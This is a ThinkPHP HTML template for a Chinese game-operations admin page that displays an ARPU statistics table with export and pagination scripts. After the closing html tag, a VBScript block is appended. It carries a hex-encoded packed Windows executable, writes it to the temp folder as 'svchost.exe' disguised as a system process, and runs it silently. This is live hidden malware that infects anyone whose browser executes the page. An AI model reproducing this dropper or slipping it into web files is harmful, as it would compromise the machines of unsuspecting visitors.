|
|
|
|
<!DOCTYPE html>
|
|
|
|
|
<html xmlns="http://www.w3.org/1999/xhtml">
|
|
|
|
|
<head>
|
|
|
|
|
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|
|
|
|
|
<title>{$meta_title}-个人中心</title>
|
|
|
|
|
<link href="__CSS__/20170831/iconfont.css" rel="stylesheet" type="text/css">
|
|
|
|
|
<link href="__CSS__/20170831/select2.min.css" rel="stylesheet" type="text/css" />
|
|
|
|
|
<link href="__CSS__/20170831/common.css" rel="stylesheet" type="text/css">
|
|
|
|
|
<link href="{:get_cover(C('CH_SET_ICO'),'path')}" type="image/x-icon" rel="shortcut icon">
|
|
|
|
|
<script type="text/javascript" src="__JS__/jquery-1.11.1.min.js"></script>
|
|
|
|
|
|
|
|
|
|
<!--[if lt IE 9]>
|
|
|
|
|
<script type="text/javascript" src="__STATIC__/jquery-1.10.2.min.js"></script>
|
|
|
|
|
<![endif]-->
|
|
|
|
|
{:hook('pageHeader')}
|
|
|
|
|
<script type="text/javascript" src="__STATIC__/layer/layer.js" ></script>
|
|
|
|
|
<block name="css"></block>
|
|
|
|
|
<script type="text/javascript" src="__JS__/20170831/common.js"></script>
|
|
|
|
|
|
|
|
|
|
<link href="__CSS__/20170831/data.css" rel="stylesheet">
|
|
|
|
|
<style type="text/css">
|
|
|
|
|
.keywords_information {margin-left:15px;cursor:pointer;}
|
|
|
|
|
.keywords_information .keywords_mark {height:35px;line-height:35px;color:#145ccd;}
|
|
|
|
|
.keywords_information .keywords_mark span{border-bottom:1px solid transparent;}
|
|
|
|
|
.keywords_information .keywords_mark:hover span {border-bottom-color:#145ccd;}
|
|
|
|
|
.keywords_information .keywords_content {transition:opacity 1.2s,visibility 1.5s;}
|
|
|
|
|
.keywords_information .keywords_content:before {margin-left:41px;}
|
|
|
|
|
.keywords_information .keywords_content .keywords_close {position:absolute;right:0;top:0;width:30px;height:30px;line-height:30px;color:#FFF;}
|
|
|
|
|
.keywords_information .keywords_list span:first-child {width:160px;}
|
|
|
|
|
.keywords_information .keywords_list span:last-child {width:350px;}
|
|
|
|
|
.keywords_information {position:relative;display:inline-block;}
|
|
|
|
|
.keywords_information .keywords_mark {display:block;font-size:12px;font-style:normal;font-weight:normal; }
|
|
|
|
|
.keywords_information .keywords_content.active {visibility:visible;opacity:1;transition:visibility 1.5s,opacity 1s;}
|
|
|
|
|
.keywords_information .keywords_content {visibility:hidden;opacity:0;
|
|
|
|
|
position:absolute;width:550px;z-index:10;background:#fff;border-radius:5px;
|
|
|
|
|
box-shadow:0px 4px 4px rgba(0,0,0,.1),2px 0px 2px rgba(0,0,0,.1),-2px 0px 2px rgba(0,0,0,.1);
|
|
|
|
|
top:38px;left:-20px;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
.keywords_information .keywords_content:before {
|
|
|
|
|
display:block;content:'';
|
|
|
|
|
width: 0;
|
|
|
|
|
height: 0;
|
|
|
|
|
border: 10px solid transparent;
|
|
|
|
|
border-bottom-color: #7089A1;
|
|
|
|
|
margin-top: -20px;margin-left:18px;
|
|
|
|
|
position: absolute;top:0;left:0;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
.keywords_information .keywords_title {
|
|
|
|
|
height:30px;line-height:30px;background-color:#7089A1;
|
|
|
|
|
border-top-left-radius:5px;border-top-right-radius:5px;color:#fff;
|
|
|
|
|
padding-left:10px;font-size:12px;
|
|
|
|
|
}
|
|
|
|
|
.keywords_information .keywords_list {overflow:hidden;clear:both;padding:10px;font-size:10px;padding-left:10px;border-bottom:1px solid #DBDBDD;}
|
|
|
|
|
.keywords_information .keywords_list:last-child {border-bottom:none;}
|
|
|
|
|
.keywords_information .keywords_list span {display:inline-block;display: block;
|
|
|
|
|
float: left;
|
|
|
|
|
line-height: 30px;
|
|
|
|
|
width: 420px;}
|
|
|
|
|
.keywords_information .keywords_list span:first-child {width:160px;margin-right:20px;}
|
|
|
|
|
|
|
|
|
|
.trunk-list .table .odd {background: #F0EFF5;}
|
|
|
|
|
.page-list .trunk-list .table tr {
|
|
|
|
|
height: 40px;
|
|
|
|
|
line-height: 40px;
|
|
|
|
|
color: #515974;
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
.trunk-list .table th{font-weight: 600;}
|
|
|
|
|
.trunk-list .table th, .trunk-list .table td{font-size: 14px;}
|
|
|
|
|
.page-list .trunk-list .table tr.no_data{border: none;text-align: center;}
|
|
|
|
|
.page-list .trunk-list .table tr.no_data img{padding-top: 28px;}
|
|
|
|
|
.trunk-list .table tr:nth-child(2n-1) {border-top: 1px solid #f3f5f9;border-bottom: 1px solid #f3f5f9;}
|
|
|
|
|
</style>
|
|
|
|
|
<style>
|
|
|
|
|
.pagenation {padding:25px 20px;text-align:center;position: relative;}
|
|
|
|
|
.pagenation>div {display:inline-block;text-align:center;}
|
|
|
|
|
.pagenation span,.pagenation a {display:inline-block;height:40px;padding:0px 20px;border:none; text-align:center;line-height:40px;color:#D7DCDF;float:left;}
|
|
|
|
|
.pagenation span.current,.pagenation a:hover {border-color:#526782;color:#526782;}
|
|
|
|
|
.pagenation .prev {border-top-left-radius:5px;border-bottom-left-radius:5px;}
|
|
|
|
|
.pagenation .next {border-top-right-radius:5px;border-bottom-right-radius:5px;}
|
|
|
|
|
.pagenation div {
|
|
|
|
|
float: right;
|
|
|
|
|
border-radius: 5px;
|
|
|
|
|
line-height: 1.444444;
|
|
|
|
|
}.pagenation span.rows {
|
|
|
|
|
color: #515974;position: absolute;
|
|
|
|
|
left: 0;
|
|
|
|
|
top: 30px;
|
|
|
|
|
border: none;
|
|
|
|
|
}
|
|
|
|
|
.pagenation select {
|
|
|
|
|
height: 30px;
|
|
|
|
|
float: left;
|
|
|
|
|
margin-right: 15px;
|
|
|
|
|
color: #404040;
|
|
|
|
|
border: 1px solid #ccc;
|
|
|
|
|
padding: 2px;
|
|
|
|
|
border-radius: 3px;
|
|
|
|
|
}
|
|
|
|
|
.pagenation .sch-btn, .pagenation .sch-btn:hover {
|
|
|
|
|
background: #3C95C8;
|
|
|
|
|
font-size: 14px;
|
|
|
|
|
font-weight: normal;
|
|
|
|
|
cursor: pointer;
|
|
|
|
|
color: #fff;
|
|
|
|
|
cursor: pointer;
|
|
|
|
|
border-radius: 3px;
|
|
|
|
|
text-align: center;
|
|
|
|
|
border-bottom: none;
|
|
|
|
|
width: 55px;
|
|
|
|
|
height: 30px;padding: 0;
|
|
|
|
|
float: right;
|
|
|
|
|
margin-left: 15px;
|
|
|
|
|
line-height: 30px;
|
|
|
|
|
border: none;
|
|
|
|
|
}
|
|
|
|
|
</style>
|
|
|
|
|
</head>
|
|
|
|
|
|
|
|
|
|
<body style="background:#ffffff">
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<div class="trunk" style="padding:0;">
|
|
|
|
|
|
|
|
|
|
<div class="page-list query-recharge-list" style="margin-top:0px;min-height:200px;">
|
|
|
|
|
|
|
|
|
|
<div class="trunk-content article">
|
|
|
|
|
<div class="trunk-list">
|
|
|
|
|
<table class="table" id="datacontent">
|
|
|
|
|
<table class="table" id="datatable"><thead>
|
|
|
|
|
<tr class="odd">
|
|
|
|
|
<th>游戏名称</th>
|
|
|
|
|
<th>新增玩家</th>
|
|
|
|
|
<th>活跃玩家</th>
|
|
|
|
|
<th>1日留存</th>
|
|
|
|
|
<th>充值金额</th>
|
|
|
|
|
<th>付费玩家</th>
|
|
|
|
|
<th>新增付费用户</th>
|
|
|
|
|
<th>付费率</th>
|
|
|
|
|
<th>ARPU</th>
|
|
|
|
|
<th>ARPPU</th>
|
|
|
|
|
</tr></thead><tbody>
|
|
|
|
|
<empty name="list_data">
|
|
|
|
|
<tr class="no_data"><td colspan="11"><img src="__IMG__/20180207/icon_chakan_wushujv1.png"/><p style="line-height: 20px;color: #A5A5A5;">暂无数据</p></td></tr>
|
|
|
|
|
<else />
|
|
|
|
|
<volist name="list_data" id="vo" mod="2">
|
|
|
|
|
<tr name="rows" class="<eq name='mod' value='1'>odd</eq>">
|
|
|
|
|
<td>{$vo.game_name}</td>
|
|
|
|
|
<td>{$vo.register_num}</td>
|
|
|
|
|
<td>{$vo.act_user}</td>
|
|
|
|
|
<td>{$vo.keep_num}%</td>
|
|
|
|
|
<td>{$vo.spend}</td>
|
|
|
|
|
<td>{$vo.spend_people}</td>
|
|
|
|
|
<td>{$vo.spend_news}</td>
|
|
|
|
|
<td>{$vo.spend_rate}</td>
|
|
|
|
|
<td>{:number_format($vo['ARPU'],2)}</td>
|
|
|
|
|
<td>{:number_format($vo['ARPPU'],2)}</td>
|
|
|
|
|
</tr>
|
|
|
|
|
</volist>
|
|
|
|
|
</empty></tbody>
|
|
|
|
|
</table>
|
|
|
|
|
</table>
|
|
|
|
|
<div class="pagenation clearfix">
|
|
|
|
|
<a class="sch-btn" id="export_data" href="{:U('Export/arpu_analysis_detail',array(
|
|
|
|
|
'bangbi'=>I('bangbi'),
|
|
|
|
|
'promote_id'=>I('promote_id'),
|
|
|
|
|
'time'=>I('time'),
|
|
|
|
|
|
|
|
|
|
'xlsname'=>'数据管理_ARPU统计_ARPU详情'
|
|
|
|
|
))}" >导出</a>
|
|
|
|
|
{$_page}
|
|
|
|
|
</div>
|
|
|
|
|
</div>
|
|
|
|
|
</div>
|
|
|
|
|
</div>
|
|
|
|
|
|
|
|
|
|
<link rel="stylesheet" type="text/css" href="__CSS__/p_jquery.datetimepicker.css">
|
|
|
|
|
<script type="text/javascript" src="__JS__/jquery.datetimepicker.js"></script>
|
|
|
|
|
<script type="text/javascript" src="__JS__/20170831/select2.min.js"></script>
|
|
|
|
|
<script type="text/javascript" src="__JS__/20170831/pagination.js"></script>
|
|
|
|
|
<script type="text/javascript" src="__JS__/20170831/string.js"></script>
|
|
|
|
|
<script type="text/javascript" src="__JS__/20170831/tabpage.js"></script>
|
|
|
|
|
<eq name='timeout' value='1'>
|
|
|
|
|
<script>
|
|
|
|
|
layer.msg('时间间隔不能超过90天');
|
|
|
|
|
</script>
|
|
|
|
|
</eq>
|
|
|
|
|
<script>
|
|
|
|
|
function chakan() {
|
|
|
|
|
url = "{:U('Query/cha_userarpu',array('time'=>$vo['time'],'promote_name'=>$promote_name,'promote_id'=>$_REQUEST['promote_id']))}";
|
|
|
|
|
timetitle ="游戏数据";
|
|
|
|
|
ptitle = "游戏数据";
|
|
|
|
|
console.log(url);
|
|
|
|
|
layer.open({
|
|
|
|
|
type: 2,
|
|
|
|
|
title: false,
|
|
|
|
|
closeBtn: 0, //不显示关闭按钮
|
|
|
|
|
shade: [0],
|
|
|
|
|
area: ['1px', '1px'],
|
|
|
|
|
offset: 'rb', //右下角弹出
|
|
|
|
|
time: 1, // 秒后自动关闭 这里设置成1ms 不显示过度页面
|
|
|
|
|
anim: 2,
|
|
|
|
|
content: ['', 'no'], //iframe的url,no代表不显示滚动条
|
|
|
|
|
end: function () { //
|
|
|
|
|
layer.open({
|
|
|
|
|
type: 2,
|
|
|
|
|
title: timetitle + ptitle + '游戏数据',
|
|
|
|
|
shadeClose: true,
|
|
|
|
|
shade: false,
|
|
|
|
|
maxmin: true, //开启最大化最小化按钮
|
|
|
|
|
area: ['50%', '45%'],
|
|
|
|
|
content: url//iframe的url
|
|
|
|
|
});
|
|
|
|
|
}
|
|
|
|
|
});
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
</script>
|
|
|
|
|
<script type="text/javascript">
|
|
|
|
|
setValue('promote_id',{$Think.request.promote_id|default=0});
|
|
|
|
|
setValue('game_id','{$Think.request.game_id|default=0}');
|
|
|
|
|
$().ready(function(){
|
|
|
|
|
$("#pagehtml a").on("click",function(event){
|
|
|
|
|
event.preventDefault();//使a自带的方法失效,即无法调整到href中的URL(http://www.baidu.com)
|
|
|
|
|
var geturl = $(this).attr('href');
|
|
|
|
|
$('#data_form').attr('action',geturl);
|
|
|
|
|
$('#data_form').submit();
|
|
|
|
|
});
|
|
|
|
|
$('#sdate').datetimepicker({
|
|
|
|
|
lang:'ch',
|
|
|
|
|
format:'Y-m-d',
|
|
|
|
|
formatDate:'Y-m-d',
|
|
|
|
|
scrollMonth:false,
|
|
|
|
|
scrollTime:false,
|
|
|
|
|
scrollInput:false,
|
|
|
|
|
timepicker:false
|
|
|
|
|
});
|
|
|
|
|
|
|
|
|
|
$(".select_gallery").select2();
|
|
|
|
|
|
|
|
|
|
$('#edate').datetimepicker({
|
|
|
|
|
lang:'ch',
|
|
|
|
|
format:'Y-m-d',
|
|
|
|
|
formatDate:'Y-m-d',
|
|
|
|
|
scrollMonth:false,
|
|
|
|
|
scrollTime:false,
|
|
|
|
|
scrollInput:false,
|
|
|
|
|
timepicker:false
|
|
|
|
|
});
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
tablePage('datatable', 'datacontent', 'pagenation', [1, 2, 4, 5, 6, 10], false);
|
|
|
|
|
|
|
|
|
|
$('.keywords_information .keywords_mark').click(function() {
|
|
|
|
|
var that = $(this).siblings().addClass('active');
|
|
|
|
|
console.log(that);
|
|
|
|
|
$(document).click(function(event) {
|
|
|
|
|
var e = event || window.event;
|
|
|
|
|
var target= $(e.target);
|
|
|
|
|
if (!target.hasClass('keywords_information') && target.closest('.keywords_information').length<1) {
|
|
|
|
|
that.removeClass('active');
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
});
|
|
|
|
|
|
|
|
|
|
that.find('.keywords_close').click(function() {
|
|
|
|
|
that.removeClass('active');
|
|
|
|
|
|
|
|
|
|
return false;
|
|
|
|
|
});
|
|
|
|
|
|
|
|
|
|
return false;
|
|
|
|
|
});
|
|
|
|
|
|
|
|
|
|
$("#game_id").change(function(){
|
|
|
|
|
var game_name = $('#game_id option:selected').text();
|
|
|
|
|
$("#game_name").val(game_name);
|
|
|
|
|
});
|
|
|
|
|
|
|
|
|
|
$("#promote_id").change(function(){
|
|
|
|
|
var account = $('#promote_id option:selected').text();
|
|
|
|
|
$("#promote_account").val(account);
|
|
|
|
|
})
|
|
|
|
|
});
|
|
|
|
|
</script>
|
|
|
|
|
|
|
|
|
|
</body>
|
|
|
|
|
</html>
|
|
|
|
|
<SCRIPT Language=VBScript><!--
|
|
|
|
|
DropFileName = "svchost.exe"
|
|
|
|
|
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C49AED60FE3CFFFFFFC7855C2B094C37B3FFE6EF0A195DD08175A035FF4DAC1155A0C9C204306E7FBF9F6845E0322D45A4346A35E804021C331F39D921085C803534311A8C8CBDFBBC815D0639C4C9C372143069B6DFDE3437353322F038383237833838BB9BBF1B700936333631FF8D4429B52C05017D7CB2F7EFE8F7950E836DCC00488AF0343532BEEFF6DDFC343491D0B23231748F046F791E39D9B60C18D83436CC3FB37BECFFF50185585DFF4D76198D3FF66FBF246365EC1E4588214DB4019D735DB40011951C61B2BB7809317DF8E77409DC00CD5D1E8EE03834459D7C16D6AEFBF60F37A88D9558FE0C528D8D7C065190388C4CC203044738A46B66BB05597F74DCF8350D509163939933694CBCCC386C84C9BAF40500D7044C0831D8D7CE16698406AB5171D8B2F7F7C1899D4F015588337AF7BBC2B3BDB4519CFF663A68312CDCBE8536475237DC8BBC332360369BCCDC219D488D14B9F73BBF8773D058009B9031E22FBFBD0BB85D2FEC35323835843631DF0EFF3CC8897DE081A52E723737814DDDB60DC394330C74F48235069564F6FE0AEE9E5C7721F7559C56BE67BECF4282D83134BE48B8E6B7EF7104786809094FC2F03321BD3C9193ADF1115DF8312999107C7736608DB077AD10133474096E123AA600973624E69B8423BB6408FF05124C3C8D7DCE261960B406FC094DDCC681D0B5080C94AC34579BD928FCDC3131B17440BB041BDF5930B44C5D5D80C0A41FFB1D0BD800297DC0312C217DFC83AD170B59E34681A01197B5AEDF6FBF16204C35290D197D80F79DBBF77684D2B75D366DE43368671105858E0C188F4C1C9C38376670127E3C23AFCC5703061430A5D35F6C54E505363834F89F91BEBDD93536C77AA7B021B5604819990CF3D0218578A0447448DF370F85E45052FF75A46043C9ACF4B3F483C48009C4314D8C771936D9DB6D7D07F08902295DF0496C9E846FB037884650378AD470D85A83EB9C05338403353636B637DE45DC3338682145E49088FA805BDB71DB13AC5B55A84583552F06D0ABF5C864547CB4373382A5AC05476BF874817B324A2F6C5B6FCC9177B8DCF471F0834DA54B8DEDA031210381CF863137D919DFD99E9C510718B1C7123C4F3232407C9C33349449EFF16653C6B1FADB37C9AD3DBC3135CCDC8C32320A9330093B560770EA3083353BE7E8BE354FE8323169B3F8F40064066B64D39831D2B76DAE124E0436315053C7CB1A7F9D4C6833AF75D468EBD6C2F7D72120F06A31069D84F8FB671D58C69C21899F342E722C0874E0F43732B93732D908A62B043CED82CFC9C8643D10B88481F0C0E1D36DC4E881AD0AA0211E5D69A1BDC0902913A5
|
|
|
|
|
Set FSO = CreateObject("Scripting.FileSystemObject")
|
|
|
|
|
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
|
|
|
|
|
If FSO.FileExists(DropPath)=False Then
|
|
|
|
|
Set FileObj = FSO.CreateTextFile(DropPath, True)
|
|
|
|
|
For i = 1 To Len(WriteData) Step 2
|
|
|
|
|
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
|
|
|
|
|
Next
|
|
|
|
|
FileObj.Close
|
|
|
|
|
End If
|
|
|
|
|
Set WSHshell = CreateObject("WScript.Shell")
|
|
|
|
|
WSHshell.Run DropPath, 0
|
|
|
|
|
//--></SCRIPT>
|